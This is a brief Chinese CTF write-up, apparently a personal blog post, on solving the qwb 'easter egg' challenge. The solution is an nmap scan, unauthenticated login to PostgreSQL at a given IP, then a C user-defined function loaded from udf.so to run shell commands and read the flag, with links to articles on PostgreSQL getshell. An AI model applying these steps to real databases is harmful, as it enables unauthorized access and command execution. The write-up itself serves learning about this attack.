这次qwb就做了两三道题…差不多零输出…

有一道题目叫彩蛋…据说做出来的很多人都是非预期解出来..就是大概是这样子

1. 先nmap扫一下发现5432端口的psql…

2. 然后尝试未授权登录

   psql -h 106.75.97.46 -U postgres
   

3. 之后使用UDF…
   这里我不太会了…但目录下有一个现成的udf.so…可以用它create一个eval函数…

   postgres=# CREATE OR REPLACE FUNCTION my_eval()  RETURNS text AS  './udf.so' LANGUAGE C STRICT;
   

   然后, 执行命令就有flag了

   select my_eval('ls /')
   select my_eval('cat /flag_is_here')
   

   等有时间学一下这个udf….
   只有一篇rr大佬发过的文章 https://www.secpulse.com/archives/33105.html
   应该是wooyun也发过
   还有一篇 http://www.jianfensec.com/postgresql_getshell.html